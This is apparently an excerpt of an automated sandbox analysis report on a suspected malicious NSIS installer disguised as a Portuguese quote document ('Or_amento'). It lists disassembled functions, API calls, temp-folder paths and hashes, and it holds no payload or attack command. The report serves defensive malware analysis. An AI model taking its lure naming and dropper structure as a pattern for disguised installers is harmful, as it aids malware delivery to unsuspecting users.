                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                                                          • API String ID: 1975747703-140469533
                                                                                                                                                                                                                          • Opcode ID: 42654ec177014d1f03b4ff0d2635b06bf077c7dc75d3c24c479e90fc5b65b2ec
                                                                                                                                                                                                                          • Instruction ID: d3915a60f35156ec108069fee93d058ae2b4a83f87b830a45993cae0616e5fa0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 42654ec177014d1f03b4ff0d2635b06bf077c7dc75d3c24c479e90fc5b65b2ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF61AA71640700AFD310AF659D46F2B3A6CEB84B4AF40113FF941B51E2DB7D6941CA2D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 432 402dee-402e3c GetTickCount GetModuleFileNameW call 405c25 435 402e48-402e76 call 406050 call 405a50 call 406050 GetFileSize 432->435 436 402e3e-402e43 432->436 444 402f63-402f71 call 402d8a 435->444 445 402e7c 435->445 437 403020-403024 436->437 451 402f73-402f76 444->451 452 402fc6-402fcb 444->452 446 402e81-402e98 445->446 448 402e9a 446->448 449 402e9c-402ea5 call 403242 446->449 448->449 458 402eab-402eb2 449->458 459 402fcd-402fd5 call 402d8a 449->459 454 402f78-402f90 call 403258 call 403242 451->454 455 402f9a-402fc4 GlobalAlloc call 403258 call 403027 451->455 452->437 454->452 478 402f92-402f98 454->478 455->452 483 402fd7-402fe8 455->483 462 402eb4-402ec8 call 405be0 458->462 463 402f2e-402f32 458->463 459->452 468 402f3c-402f42 462->468 481 402eca-402ed1 462->481 467 402f34-402f3b call 402d8a 463->467 463->468 467->468 474 402f51-402f5b 468->474 475 402f44-402f4e call 4064db 468->475 474->446 482 402f61 474->482 475->474 478->452 478->455 481->468 487 402ed3-402eda 481->487 482->444 484 402ff0-402ff5 483->484 485 402fea 483->485 488 402ff6-402ffc 484->488 485->484 487->468 489 402edc-402ee3 487->489 488->488 490 402ffe-403019 SetFilePointer call 405be0 488->490 489->468 491 402ee5-402eec 489->491 494 40301e 490->494 491->468 493 402eee-402f0e 491->493 493->452 495 402f14-402f18 493->495 494->437 496 402f20-402f28 495->496 497 402f1a-402f1e 495->497 496->468 498 402f2a-402f2c 496->498 497->482 497->496 498->468
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00402DFF
                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,00000400,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00402E1B
                                                                                                                                                                                                                            • Part of subcall function 00405C25: GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405C29
                                                                                                                                                                                                                            • Part of subcall function 00405C25: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00405C4B
                                                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,00443000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe,80000000,00000003,?,?,"C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe",00403536,?), ref: 00402E67
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                                                          • String ID: "C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RC_S23_3274 Or_amento ADP 231019_5_5009.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                                                          • API String ID: 4283519449-3261101956
                                                                                                                                                                                                                          • Opcode ID: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                                                                                          • Instruction ID: ecf8b1e823d6f98de7c15f593086dd5554d056807b59ad61161c89ef3c81dadd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2d58fb7518fc77c1929eb66d2bb22aca03531c5a37bc9e9edabb7a8ef5e27e55
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF51F671900216ABDB109F61DE89B9F7BB8FB54394F21413BF904B62C1C7B89D409B6C
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000,00000000), ref: 004017A8
                                                                                                                                                                                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty,?,?,00000031), ref: 004017CD
                                                                                                                                                                                                                            • Part of subcall function 00406050: lstrcpynW.KERNEL32(?,?,00000400,0040334D,Bistandspengene Setup,NSIS Error), ref: 0040605D
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,765323A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
                                                                                                                                                                                                                            • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
                                                                                                                                                                                                                            • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\fusty$C:\Users\user\AppData\Local\Temp\nswC001.tmp$C:\Users\user\AppData\Local\Temp\nswC001.tmp\System.dll$Call
                                                                                                                                                                                                                          • API String ID: 1941528284-605117104
                                                                                                                                                                                                                          • Opcode ID: 1c292b98166a31c9089d75ffbac55774b0fa1de423b16314c0e4ed2c7239b5d3
                                                                                                                                                                                                                          • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c292b98166a31c9089d75ffbac55774b0fa1de423b16314c0e4ed2c7239b5d3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 691 403027-40303e 692 403040 691->692 693 403047-403050 691->693 692->693 694 403052 693->694 695 403059-40305e 693->695 694->695 696 403060-403069 call 403258 695->696 697 40306e-40307b call 403242 695->697 696->697 701 403230 697->701 702 403081-403085 697->702 703 403232-403233 701->703 704 4031db-4031dd 702->704 705 40308b-4030d4 GetTickCount 702->705 708 40323b-40323f 703->708 706 40321d-403220 704->706 707 4031df-4031e2 704->707 709 403238 705->709 710 4030da-4030e2 705->710 714 403222 706->714 715 403225-40322e call 403242 706->715 707->709 711 4031e4 707->711 709->708 712 4030e4 710->712 713 4030e7-4030f5 call 403242 710->713 716 4031e7-4031ed 711->716 712->713 713->701 725 4030fb-403104 713->725 714->715 715->701 723 403235 715->723 720 4031f1-4031ff call 403242 716->720 721 4031ef 716->721 720->701 728 403201-40320d call 405cd7 720->728 721->720 723->709 727 40310a-40312a call 406549 725->727 733 403130-403143 GetTickCount 727->733 734 4031d3-4031d5 727->734 735 4031d7-4031d9 728->735 736 40320f-403219 728->736 737 403145-40314d 733->737 738 40318e-403190 733->738 734->703 735->703 736->716 741 40321b 736->741 742 403155-40318b MulDiv wsprintfW call 4051af 737->742 743 40314f-403153 737->743 739 403192-403196 738->739 740 4031c7-4031cb 738->740 745 403198-40319f call 405cd7 739->745 746 4031ad-4031b8 739->746 740->710 747 4031d1 740->747 741->709 742->738 743->738 743->742 751 4031a4-4031a6 745->751 750 4031bb-4031bf 746->750 747->709 750->727 752 4031c5 750->752 751->735 753 4031a8-4031ab 751->753 752->709 753->750
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CountTick$wsprintf
                                                                                                                                                                                                                          • String ID: ... %d%%$@
                                                                                                                                                                                                                          • API String ID: 551687249-3859443358
                                                                                                                                                                                                                          • Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                                                                                                          • Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 754 4025e5-4025fa call 402ba2 757 402600-402607 754->757 758 402a4c-402a4f 754->758 759 402609 757->759 760 40260c-40260f 757->760 761 402a55-402a5b 758->761 759->760 762 402773-40277b 760->762 763 402615-402624 call 405fb0 760->763 762->758 763->762 767 40262a 763->767 768 402630-402634 767->768 769 4026c9-4026cc 768->769 770 40263a-402655 ReadFile 768->770 771 4026e4-4026f4 call 405ca8 769->771 772 4026ce-4026d1 769->772 770->762 773 40265b-402660 770->773 771->762 781 4026f6 771->781 772->771 775 4026d3-4026de call 405d06 772->775 773->762 774 402666-402674 773->774 777 40267a-40268c MultiByteToWideChar 774->777 778 40272f-40273b call 405f97 774->778 775->762 775->771 777->781 782 40268e-402691 777->782 778->761 787 4026f9-4026fc 781->787 785 402693-40269e 782->785 785->787 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 785->789 787->778 788 4026fe-402703 787->788 790 402740-402744 788->790 791 402705-40270a 788->791 789->785 792 4026c7 789->792 794 402761-40276d SetFilePointer 790->794 795 402746-40274a 790->795 791->790 793 40270c-40271f 791->793 792->781 793->762 796 402721-402727 793->796 794->762 797 402752-40275f 795->797 798 40274c-402750 795->798 796->768 799 40272d 796->799 797->762 798->794 798->797 799->762
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402688
                                                                                                                                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
                                                                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1
                                                                                                                                                                                                                            • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D1C
                                                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                                                                          • String ID: 9
                                                                                                                                                                                                                          • API String ID: 163830602-2366072709
                                                                                                                                                                                                                          • Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                                                                                                          • Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 800 40567e-4056c9 CreateDirectoryW 801 4056cb-4056cd 800->801 802 4056cf-4056dc GetLastError 800->802 803 4056f6-4056f8 801->803 802->803 804 4056de-4056f2 SetFileSecurityW 802->804 804->801 805 4056f4 GetLastError 804->805 805->803
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004056D5
                                                                                                                                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 004056F4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
                                                                                                                                                                                                                          • C:\Users\user\Desktop, xrefs: 0040567E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                                                                                                                                                          • API String ID: 3449924974-26219170
                                                                                                                                                                                                                          • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                                                                                          • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 806 4063ba-4063da GetSystemDirectoryW 807 4063dc 806->807 808 4063de-4063e0 806->808 807->808 809 4063f1-4063f3 808->809 810 4063e2-4063eb 808->810 812 4063f4-406427 wsprintfW LoadLibraryExW 809->812 810->809 811 4063ed-4063ef 810->811 811->812
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040640C
                                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000005.00000002.26295494987.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295456982.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295534629.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000422000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000437000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.000000000043F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295570297.0000000000453000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000005.00000002.26295852731.0000000000457000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_400000_RC_S23_3274 Or_amento ADP 231019_5_5009.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                                          • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                                                                                          • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8
                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 813 10001759-10001795 CloseHandle call 10001b18 816 100018a6-100018a8 813->816 817 1000179b-1000179f 813->817 818 100017a1-100017a7 call 10002286 817->818 819 100017a8-100017b5 call 100022d0 817->819 818->819 824 100017e5-100017ec 819->824 825 100017b7-100017bc 819->825 826 1000180c-10001810 824->826 827 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 824->827 828 100017d7-100017da 825->828 829 100017be-100017bf 825->829 830 10001812-1000184c call 100015b4 call 100024a9 826->830 831 1000184e-10001854 call 100024a9 826->831 852 10001855-10001859 827->852 828->824 832 100017dc-100017dd call 10002b5f 828->832 834 100017c1-100017c2 829->834 835 100017c7-100017c8 call 100028a4 829->835 830->852 831->852 846 100017e2 832->846 841 100017c4-100017c5 834->841 842 100017cf-100017d5 call 10002645 834->842 843 100017cd 835->843 841->824 841->835 851 100017e4 842->851 843->846 846->851 851->824 856 10001896-1000189d 852->856 857 1000185b-10001869 call 1000246c 852->857 856->816 859 1000189f-100018a0 GlobalFree 856->859 862 10001881-10001888 857->862 863 1000186b-1000186e 857->863 859->816 862->856 865 1000188a-10001895 call 1000153d 862->865 863->862 864 10001870-10001878 863->864 864->862 866 1000187a-1000187b FreeLibrary 864->866 865->856 866->862
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(100015B1), ref: 10001786
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
